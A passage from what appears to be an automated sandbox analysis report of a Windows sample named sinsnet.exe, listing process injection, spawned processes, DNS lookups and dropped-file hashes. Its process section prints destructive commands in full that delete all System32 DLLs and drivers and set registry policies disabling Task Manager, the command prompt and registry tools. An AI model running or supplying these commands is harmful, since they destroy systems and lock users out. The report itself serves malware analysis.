N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4100 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 4100 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 4100 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 4100 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 4100 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 840 wrote to memory of 3504 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 840 wrote to memory of 3504 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2068 wrote to memory of 64 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2068 wrote to memory of 64 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4100 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2068 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2068 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4100 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 840 wrote to memory of 2108 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 840 wrote to memory of 2108 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4100 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\drivers\* && icacls c:\windows\system32\drivers\* /grant Everyone:(F) && del /s /q c:\windows\system32\drivers\* && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant Everyone:(F)

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wininit.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 84.162.74.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4100-0-0x00007FF7AEF10000-0x00007FF7AF0B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

C:\Windows\Debug\WIA\wiatrace.log

MD5 be8c4dd6caac6770fa6e688ffee75665
SHA1 a9c9cfd289e3ff6860b94cb89570033393835da9
SHA256 b969ce0af4a62a537a9a332118784215ac4b066abb46a06b4cc76a8a0733cf7e
SHA512 5925f4e8ec04a3a2f88f403e05531cf46e34068d1de0ad475845a0bc90740add999ffad8426a799bb67c67a135c7db0449f267152d109e118b6487f9bd343298

memory/4100-4-0x00007FF7AEF10000-0x00007FF7AF0B1000-memory.dmp

C:\Windows\Debug\WIA\wiatrace.log

MD5 022da0de1575260af16f698682e9c52b
SHA1 5d8889d595c4429373c9f1c7dcdb9b46d56bb5fa
SHA256 a4930a0112942af50ba600cfc8b66f8839e2c6fa3ab92662ab541413a874dc58
SHA512 49eae1db46549d78124b2d0cb0f7b48098e2a1a7d5a154e672a937a04d19c07a2b699b0eaceb7452d7cda97ed58e01921d5bbfb593cec8f269143b82ed1727d1

C:\Windows\Debug\WIA\wiatrace.log

MD5 e6ea68e728c549450fae5258615eccf3
SHA1 c1612c359ecb7bfeddaafea3f3a3cef6c57c69b4
SHA256 d9c0c536494aeb84a64bd4c1be44f5e7e6071933c622dbbfde0d0f86526f5726
SHA512 cbe6c31772b6c25331c7a3ea35c2032990f59eec3cd44f84f9244dc8c849c7a2f555c2ca9c4ba8f18e65141fd25515a6c6d5e1cc692962e08842328096179efc

C:\Windows\Debug\WIA\wiatrace.log

MD5 892c29d68ff719571da9ee3e7587a0b7
SHA1 8de57359eee313a34bb0c0e46d2081996d5ce695
SHA256 c82a41fe73eb81f153d27d94a9295f4a88e9a66a2a99182a8caf8a68fb1c4b67
SHA512 1869596411dcc5641bbe44cf441f620e4aada6207d1c716618ee4a7345bd403fbfb0ab9b214d2d07eb6541a4a1a63f835873e9e54c96985387b6edbad9d3ea6b

C:\Windows\Debug\WIA\wiatrace.log

MD5 cc0da031884d880fcf4b9ec7d3bbe9ee
SHA1 70cb51bb36f774a1db026b47a4beaa078f57458e
SHA256 0c6b97f18d6406cd4a048af8cbdf4d9492d5747d385305968ec8e246e17dfd58
SHA512 f937bcc963285ec6631409819177809e214cda5946e8d15508b9b2f6964ca86ed58da7ef98c7992c2bb12648cb36a403b3fb242c1f7dbf52decd94ea99920d7a

C:\Windows\Debug\WIA\wiatrace.log

MD5 49280863b5f28ad87164cce6de232c3e
SHA1 e63745fc2ef768b0d3b0ac8a511d6cae957fd14b
SHA256 c2e2eefa9a3100ac1df62ba6b7f4631598bcd4d2df990a8c6fee68bfd704cee1
SHA512 158c14409be0c09daefa39eb4e827bb4afa4067c419d8fa839e246644c12d572ce909f6754823321b9a9ab36918048ab9474c25feb739827d1d32ddc4b8ae2d3

C:\Windows\Debug\WIA\wiatrace.log

MD5 fcad7c1068cc7c0160e963d63057b071
SHA1 fbbec2a841a677c1b3b85cb0b71927240b4ff576
SHA256 7cc62679f3bbc2c4a44d59c94ac832977fef19b34f6b493ac72464973057bc50
SHA512 2108b797798adbcd256278ab62580cb8c11b815a01523056b0cc72bed10f99f236f5eef331196d7dc3231e208660cfec98fe52b973439db81bfcefeb35b124f0

C:\Windows\Debug\WIA\wiatrace.log

MD5 9ab40273f2ce8764a8cf383729478bb4
SHA1 0f07cf2abb3f9891173f124eb738187ca0005794
SHA256 21e6cb55d5fc427439e5c83eb4edb15b6e3039df8f87b440ccc7e49de970ff46
SHA512 c78725c3f2fe4da4b466c7ee9fc3e2a4346864c53f246b6394f39d025aab8c35e1c7027a0dcb4b0b95f60b54fca4e4dda7a8fbe79348975e722ed623ea0bddfd

C:\Windows\Debug\WIA\wiatrace.log

MD5 4257f3808f993b3470372cea59a0d38a
SHA1 631d9a5146be6999aeb3e9f933067e96b54c4b33
SHA256 4c646553f24b4328d339c934794baadfb406d44fbfbbed9c68b6e335bb8ba3c1
SHA512 5c4c24c28144871d567da2eb5bfc060476886b4bc1745e846e87d4a7b532540e14b352de8c00dac02d4688c7ed41567b2334cf37c30e3ecd3b9c33fe83d7996f

C:\Windows\Debug\WIA\wiatrace.log

MD5 772cf0ac1732ab671d775b7500c5a316
SHA1 97f0837402feed3422b25597671c3b7462f54dcb
SHA256 42c67f7c057753d6d9dd1c9f3255015c6a64a8bc0d98caab02dc4ac688ddd14c
SHA512 c7a25b50ead89e807b641e3001fe115a61ba9925785cc26cec4b076f91a9caf69947d3b6f278333ea18d32d5f7a62ca138f1dec6d0185e8cb16b0f451dc0e26a

C:\Windows\Debug\WIA\wiatrace.log

MD5 d89b72ad2704c1d2d56c7354726fd340
SHA1 fe827d26e0d3cfe7646f1767795baa975ea0f43c
SHA256 263386dc8ecec454d4d0dc6c2fa464ed54d7524fed39b9927ea03304336ef7f1
SHA512 ed28d5a135515422aca320072b992d3ae899b2d978831f376af55162bcde0cb1861190830ffe0033f89722dc04b69ea368709cc08fb67f8bca5c46965cfaba6d

C:\Windows\Debug\WIA\wiatrace.log

MD5 188c8a5e54c4d17783958edd125addcc
SHA1 07c75a31ac8bd1e3a376bf58546394e7f56005f1
SHA256 be3f93011701aed801033731b81356b561f53d31231ee0f4fdbdec53f2086290
SHA512 6f54c48d8fe5814d72f45d52b3f555b8904bbe9acadffa56960b0060be22d264dc4a9309a88cfad8f2a57a9e568f7411922be326adfb755aab33ae687a36be43

C:\Windows\Debug\WIA\wiatrace.log

MD5 34c732a85e77ba70f087355aa1f0496c
SHA1 366604f466403c2451be3c02f30db3111b9cd6a3
SHA256 6c0dc43044303ba9fc7af65ca06b581b8173626aa5c83dd05f1d12efd028b254
SHA512 ac4f813838638ace57b685c249f271f8dd98bf6cbb67ed529d5068b26302acd3330b3e8fb98a8b3ecd294641bbf34ddbe46540a7b6f6c94221c36bf1ccd18e41

C:\Windows\Debug\WIA\wiatrace.log

MD5 e0046fc6fad9eae976075abd6152187b
SHA1 d7b8a24656ac0b26f1a5d3176ac7e952d0a1dfdf
SHA256 63878284baf601f0b704e91416fd01c9d74747240c3d9e1037627eafed6bb633
SHA512 ffbfb9568b3b39c08ad565dd245a1720d1ddb9b183c767020e61fa395f55e8457c5964e7c7af1fdcd889ba5197ff5cf02157a89b10ba5852ec3584d36bb4a6c2

C:\Windows\Debug\WIA\wiatrace.log

MD5 b39bcb03c440f285239a98f6ef0bccf4
SHA1 18765a5b26130fbcd9f9eb3cd3943e6479aa0709
SHA256 272f8792e3f2266b48ada333d99fdc989c18146a29bfa9b02ef9f93fbbafc927
SHA512 ca5ab54f3f5ac0abeb9dcbf6ef53ac1e05971d19266d4bc62f02573c67cf02c15498073d41779b99e688b42cb93f770f87d545c447fc97ac847f199eecd5958d

C:\Windows\Debug\WIA\wiatrace.log

MD5 cd6f24882a2dd857efdd5004a0ec4b4a
SHA1 9e033e66cc5d899281be63063b2bcf35635eb7ed
SHA256 df61e43796902e489213ed076f3f6a64c0de1e1e9a63a8a9632e8c4a078ba5cf
SHA512 b45a1301c489808f56c366b68ed6ff2b3573c13d004325aa79f5c72f44858271f4718cbd16ef7e4a7389cfd7bea48e5cb63d57d8ffee59f66354dfaf0da91e4e

C:\Windows\Debug\WIA\wiatrace.log

MD5 0ed9e1712d5babdb2f5418be68fb3b70
SHA1 444fd64f8c26ad531f427f69af590788c8efc183
SHA256 19174a1da711b9f862471f36c45e2913020fa03fd62e5122a4e8e545e693d24e
SHA512 470bc29bfeb90307f236fa924051930a95f5fba69c2a23f7f5958cc57b72e8415285c26f0d5096831bb9aa8ddbb1b64729e9d9a8474658ce8456dd814f0bff41

C:\Windows\Debug\WIA\wiatrace.log

MD5 0879145456831ae39abb735a6fcb762c
SHA1 e7e5db8c527cb66bd56f06a3e3bc118a4e5a8af5
SHA256 314f900cdb8a5e2262127f7b0e9cae0322f1963fcb3f4dc169dd92f7d6704746
SHA512 77a8c1b377600d6502b5e4841d01834581576ac84d6cbeec2f9a6491c954b21836ce73c279871223c5569cfe0dadb74549306bbfdd31fe103b2b6cea1c8a9109

C:\Windows\Debug\WIA\wiatrace.log

MD5 ca3a3d86dbc5a8efaac5e54d244d0a1c
SHA1 027c4524dfc5f2951305f6e47f1a6c99eeb82984
SHA256 34bff2b687145d0f560654afbd1f4cc725addd23334d8c8656bd448640273fb1
SHA512 c1c65e35031230d44f0d9351646b9de1b798569d80ecb76510b19d468d703deff760a560788860d4e00772c2fa2e69cbcf9e21273de4244c661efabcd3d24084

C:\Windows\debug\WIA\wiatrace.log

MD5 3a589adc575c8b8e2e70c02fe24b7cad
SHA1 c66dc874d668710024d1556316a8f72c7d69aa0f
SHA256 4c90a6abae3a3dfbe2520c495644c699fef27436cf4b36feb09f0e12c285eafa
